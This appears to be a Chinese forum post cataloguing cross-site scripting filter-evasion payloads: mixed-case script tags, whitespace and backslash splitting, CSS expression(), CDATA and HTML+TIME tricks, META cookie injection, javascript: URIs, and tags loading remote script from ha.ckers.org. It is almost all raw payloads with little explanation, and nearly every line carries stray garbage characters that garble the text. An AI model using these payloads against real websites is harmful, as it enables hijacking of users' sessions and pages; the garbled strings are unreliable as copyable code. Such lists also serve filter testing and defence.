1. 改变字符大小写
. h y! o$ k- W6 D4 G& W D; S( B9 {( g0 w
; b; T! u* o8 @, o
* U$ v: D% C) w( K7 U <sCript>alert(‘d’)</scRipT>& w6 m% q6 m* e3 z7 b5 {6 A
+ D# n, H& ~- ?; O, R2. 利用多加一些其它字符来规避Regular Expression的检查7 D( W1 T% i; u
4 R2 X' }- ?; F; a; c7 N" Y4 {
<<script>alert(‘c’)//<</script>
) @' Z& e! l+ o' S
. g5 \' g v+ J <SCRIPT a=">" SRC="t.js"></SCRIPT>, j: ` h2 r1 Z9 r5 c6 q. L
4 n9 _ ?$ v* v <SCRIPT =">" SRC="t.js"></SCRIPT>; H* z( D' y1 g1 e
g9 I% L2 w4 L <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
8 U" V7 w" c: W6 n$ \6 O) |. L6 t+ `) \6 ]" y) [' i; N! C8 V4 R- `6 E
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
% i, L4 Q7 [4 R, A- W+ V' p2 ]6 x$ j3 H3 [
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
2 {) A6 ]3 N1 d# W
& w# t9 z: u4 ]) i' r9 V U5 q <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
Y" J& J( w8 y- F
6 h" V/ j: @; O' U- r, _3. 以其它扩展名取代.js. n5 I' _. X& h8 `
9 E& }+ X+ q z
<script src="bad.jpg"></script>
" K% k$ Z, I' }, j( O1 g
& m9 _1 c' T2 u3 o; n4. 将Javascript写在CSS档里 c* K a! d. J+ D) u# B9 Y8 v
+ e9 _- O0 R( V
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">& P& O0 [- C2 w" b, g7 P+ _
3 @! Z& O8 _3 s# J4 @9 t# d example:
" | K# Y+ M9 ], c5 c4 k+ m5 N! H Y' Q1 x; n, S" J6 @" h7 }
body {/ f2 D8 L7 J7 i0 @) Z4 T% n
/ q7 D/ Q. \7 F$ y M
background-image: url(‘javascript:alert("XSS");’), D6 Q P! y. q& ~0 q; @3 ?7 r" B
, T7 Y; X6 T8 T8 Q/ D
}# p" L6 E6 Z! \8 I) e% Y' t
3 K; t8 L b0 L
5. 在script的tag里加入一些其它字符
- b5 o. m! }+ C2 i1 f/ }# X
) A& T D* p4 n5 r% ^9 A! W <SCRIPT/SRC="t.js"></SCRIPT>. H7 [! O4 }0 v7 e+ R
& g$ v' p2 ~4 S) G& Y9 o# l <SCRIPT/anyword SRC="t.js"></SCRIPT>
3 D( O) y, H% T* A- ~+ U W( {9 q: o0 q9 V; {2 L7 z
6. 使用tab或是new line来规避
/ y5 f: N* X& F: @. h9 C* c5 x& ~, Y- J f' u7 ]7 N
<img src="jav ascr ipt:alert(‘XSS3′)">
" i. `1 ?; R5 P& K6 k
S j. c; ?; F R3 L <img src="jav ascr ipt:alert(‘XSS3′)">
: z3 d2 w6 T; M- U8 W
2 t6 `* j, [% Z( k, k0 _ <IMG SRC="jav ascript:alert(‘XSS’);">$ l' ^, r0 J8 d' u; H2 i+ o3 ]
0 q. E) \7 i% Q' g9 w -> tag: l- q8 b$ }6 l& @
5 M4 u/ W; u4 I+ J: l! ~5 v
-> new line% X: ?5 A4 `1 W& J9 ?' W$ _$ A
+ h# m6 M8 V! p5 S- l- N7. 使用"\"来规避& F; K# J2 u) G) w& z& h, M
t9 @$ _5 |$ A# X7 a <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>6 S1 J4 e: m( H
+ O2 | a7 u% \$ C
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
) x5 F. h4 S# k# M! X8 y; d, M# B7 c
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">5 N- {% w7 l; j3 S
7 L. H3 J! ^8 z" x2 g) m <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
: P( {9 A5 q4 G9 A$ T* P8 i5 W% a- w `
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>6 i' n- K' T+ X* q0 k6 ]
7 L6 C% v: z! s" _) U8. 使用Hex encode来规避(也可能会把";"拿掉)' `/ N$ b: X* R5 n6 N, ^2 l* }
% I2 B" ~, {( [- | <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">4 s$ n0 j. j- q& T- u) k, y
4 p G! i1 g" G& L8 V; X- W 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
# J* i, D3 [* Z7 f) H h {
! y* o$ W; t" W <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">+ F$ e& S1 R( H6 F% }2 |/ B+ k
! B% ]( A, ~, v$ C 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">" l0 D. [9 w2 L* f% l
: [- Z4 _ x5 |& D' u( p4 E
9. script in HTML tag
/ U; e( o ?) L9 p1 C* _! V. @5 p( c2 H C: }8 E
<body onload=」alert(‘onload’)」>
6 V x! ~4 ?0 I2 Q- I( K) V1 o4 D. m/ C$ X% H# Y" T2 t
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload4 y0 r& V5 W) B3 ^
) A' _: x) Q7 \
10. 在swf里含有xss的code+ c: z. N+ I0 @9 M; K) V& j# ]
6 e6 a, c3 j: s <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>" t- n- r5 }/ @
3 d; F5 _% W! W T5 S11. 利用CDATA将xss的code拆开,再组合起来。9 O1 D% R4 C) M& |2 Z9 O
8 B! F8 n( N2 n/ O! u/ n
<XML ID=I><X><C>
4 ?0 _- H2 _: O7 g9 @/ b- g" f5 I+ `( j/ d" y- d2 c8 M: K' C
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>* c1 r" h# a5 }0 q6 @9 \4 h: q
- ~6 N. M8 n* B
</C></X>3 W' A) ]2 x& h. h% u: k! `! }
# v4 l8 W8 J9 U( h0 O; m+ `0 a3 q1 h </xml>! U3 J5 J3 K7 f# c% [3 k7 S
2 p, `2 x5 w% Q0 T7 w <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>/ s+ M# [1 \: e
5 G% ^3 V8 }& m0 ~$ A5 S
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
! ~' R3 W1 o; P, A% L/ {
2 F' B+ F3 q( K B <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
* e7 L, a& k' Z1 K( j/ i* C, m( l1 ?3 Q: I) I
12. 利用HTML+TIME。
2 V9 O9 ~+ \# b% n o1 T7 N& B
/ x C0 P) w* d# [( N <HTML><BODY>5 F7 m8 e( }) a; ]
0 O/ ?" V5 W; u2 C
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
* v( }; v) G% Z) Y$ {
1 Y# S) }+ ~" l" @# m <?import namespace="t" implementation="#default#time2">6 _4 G1 L. t7 E9 f; q
1 d5 a$ z, g/ x+ Q4 I* `" w- ` <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
5 N' y! c$ ]8 |4 m1 K$ h0 R$ K. F6 n
</BODY></HTML>
6 U- b( J: i- q% B) N! v3 B7 B4 V+ ^
13. 透过META写入Cookie。0 ]: l1 X* z' T, E# i! j3 g
; g$ H2 {0 R; k8 M% g0 u
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
8 ^% q0 k9 y1 S8 J9 ?5 Q& r; @. c2 W
6 u) g: X2 P% V' K3 D. s4 x1 P14. javascript in src , href , url
5 ]$ `( [: V# J6 I. P( l3 u+ T" s1 U! k9 r$ v
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
' `* a% Y" K3 b2 ^
, T) f) y& ~0 r" Z" l, d0 ?4 }+ I <img src="javascript:alert(‘XSS3′)">( {& b! [* n- n5 p
( v4 V% I, l* M2 w0 ^5 Z<IMG DYNSRC="javascript:alert(‘XSS20′)">+ N7 m2 y: ^% u2 {# L
% C, U- `3 p+ F <IMG LOWSRC="javascript:alert(‘XSS21′)">
; @ v7 ?4 @1 K! b$ y# E' h
* |0 F4 X# F! \) z2 _ <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">. l& y! H' g- `' P, W9 i
4 ^4 g$ K, Y. U; {1 f8 x2 q <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>/ n/ o( S$ L+ ?; O
1 H- T3 w/ O0 L4 U v
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
& @# m' r7 m$ z+ N4 ~9 r
1 S5 N R( D8 n2 q% o- W <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">% R; J. l% J' c" o9 M
7 u/ c- o# u( J$ `& \/ h+ m <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
/ l! C- E% n! a$ m9 K2 g; H) k2 o
</STYLE><A CLASS=XSS></A>
+ T& h' F; c& W h1 V+ v2 T
; I3 y, f4 u: P, p+ m' t <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
- V1 s, p, B& V1 j; [7 i5 U6 `. F* T& _' K
|
发表于 2012-12-31 09:59:28
收藏
支持
反对